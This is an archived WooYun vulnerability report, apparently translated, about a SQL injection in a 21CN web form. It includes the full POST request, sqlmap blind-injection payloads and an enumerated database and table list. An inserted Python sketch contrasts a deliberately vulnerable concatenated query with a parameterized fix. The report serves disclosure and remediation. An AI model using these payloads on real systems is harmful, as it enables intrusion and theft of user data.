Vulnerability summary

Defect ID: wooyun-2015-0127189

Title: SQL injection in a form at 世纪龙 (21CN)

Vendor: 世纪龙信息网络有限责任公司

Author: 路人甲

Submitted: 2015-07-16 15:47

Fixed: 2015-08-30 22:54

Published: 2015-08-30 22:54

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 16

Status: confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-16: details sent to the vendor, awaiting vendor handling
2015-07-16: vendor has confirmed; details visible to the vendor only
2015-07-26: details disclosed to core white hats and domain experts
2015-08-05: details disclosed to regular white hats
2015-08-15: details disclosed to intern white hats
2015-08-30: details disclosed to the public

Brief description:

Details:

POST /home/preview HTTP/1.1
Content-Length: 946
Content-Type: multipart/form-data; boundary=-----wooyunBoundary_DTQUTVUHKJ
X-Requested-With: XMLHttpRequest
Referer: http://ts.21cn.com/
Cookie: PHPSESSID=06f83672ea38aac0b7e54abeb038a20f; JSESSIONID=aaa9wVJf_6Gee7WcYBv6u
Host: ts.21cn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----wooyunBoundary_LFUYYLIYJS
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--

Proof of vulnerability:

sqlmap identified the following injection points with a total of 126 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
current user: None
current user is DBA: False
current user: 'jtsuser@10.29.5.33'
current user is DBA: False
available databases [3]:
[*] information_schema
[*] jutousu
[*] test
Database: jutousu
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| iic_user | 82710 |
| iic_reply | 54781 |
| iic_log | 49619 |
| iic_digg | 46570 |
| iic_post_sync | 18118 |
| iic_user_addres | 17637 |
| iic_post | 15565 |
| iic_digg_20131224 | 13041 |
| iic_post_com | 12930 |
| iic_reply_sync | 6894 |
| iic_area | 3407 |
| iic_collective_digg | 2153 |
| iic_case | 941 |
| iic_access | 936 |
| iic_com | 764 |
| iic_wxuser | 750 |
| iic_recom | 731 |
| iic_collective_reply | 672 |
| iic_post_dealwith_satisfaction | 640 |
| iic_captcha | 531 |
| iic_merchant | 472 |
| iic_node | 278 |
| iic_movice | 188 |
| iic_redblackdigg | 100 |
| iic_ipadmin | 99 |
| iic_feedback | 95 |
| iic_collective | 93 |
| iic_postkeyword | 93 |
| iic_cat | 61 |
| iic_reply_link | 60 |
| iic_collectivetimeline | 59 |
| iic_collectivenews | 43 |
| iic_hotpost | 42 |
| iic_team | 42 |
| iic_article | 40 |
| iic_role_account | 36 |
| iic_account | 30 |
| iic_specialcolumn | 27 |
| iic_collectiveslide | 26 |
| iic_proc | 26 |
| iic_redblacklist | 25 |
| iic_keyword | 12 |
| iic_collectiveweibo | 11 |
| iic_admin | 8 |
| iic_role | 6 |
| iic_ip | 4 |
| iic_experttype | 3 |
| iic_arc | 2 |
| iic_wbsync | 2 |
| iic_filter | 1 |
+--------------------------------+---------+

Fix recommendation:

Fix it.

Copyright notice: when reposting, credit the source as 路人甲@乌云
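The sqlmap probe above, `a%') AND 3901=3901 AND ('%'='`, only parses if the form value is spliced into a `LIKE ('%...%')` predicate by string concatenation. The following Python/sqlite3 sketch is an added example, not code from the report or from the vendor: it places that vulnerable query shape next to a parameterized, wildcard-escaped version that treats the same value as literal text. The table and column names and the sample merchant rows are assumptions constructed for the demo.

```python
import sqlite3

# Constructed sample data standing in for a merchant table; the table and
# column names are assumptions, not taken from the report.
MERCHANTS = ["Alpha Shop", "Moon Bistro", "100% Organic", "Gamma Mart"]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE merchant (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO merchant(name) VALUES (?)",
                     [(m,) for m in MERCHANTS])
    return conn


def vulnerable_search(name):
    # The query shape the report's payload implies: the form value is pasted
    # into a LIKE ('%...%') predicate, so quotes and keywords in the value
    # become SQL. Kept here only as the "before" of the fix.
    conn = _connect()
    sql = ("SELECT name FROM merchant WHERE name LIKE ('%" + name + "%') "
           "ORDER BY id")
    return [row[0] for row in conn.execute(sql)]


def _escape_like(value):
    # Escape the LIKE metacharacters so user text is matched literally.
    return (value.replace("\\", "\\\\")
                 .replace("%", "\\%")
                 .replace("_", "\\_"))


def safe_search(name):
    # Hardened form: the value travels as a bound parameter, never as SQL
    # text, and its wildcards are escaped so "100%" matches only the literal.
    conn = _connect()
    sql = "SELECT name FROM merchant WHERE name LIKE ? ESCAPE '\\' ORDER BY id"
    pattern = "%" + _escape_like(name) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    probe = "a%') AND 3901=3901 AND ('%'='"   # the boolean probe from the report
    # SQLite's LIKE is case-insensitive for ASCII, so every name containing
    # an "a" or "A" matches the truncated '%a%' pattern in the vulnerable form.
    print("vulnerable:", vulnerable_search(probe))
    print("safe:      ", safe_search(probe))
    print("literal %: ", safe_search("100%"))
```

In the vulnerable form the probe rewrites the predicate and the rows still come back; in the hardened form the identical value is just a string nobody's name contains, so the result is empty.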


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-07-16 22:53

Vendor reply:

Thank you for your attention to the security of our services. Based on your report, we have started handling the issue. Thanks.

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2015-07-24 12:21 | 紫霞仙子 ( regular white hat | Rank:2027 vulnerabilities:279 | 天天向上 !!!)

    Sorry, the vulnerability details were pasted wrong when I copied them; I have contacted WooYun to fix it.

  2. 2015-07-24 12:22 | 紫霞仙子 ( regular white hat | Rank:2027 vulnerabilities:279 | 天天向上 !!!)

    Sorry, the vulnerability details were pasted wrong when I copied them; I have contacted WooYun to change it.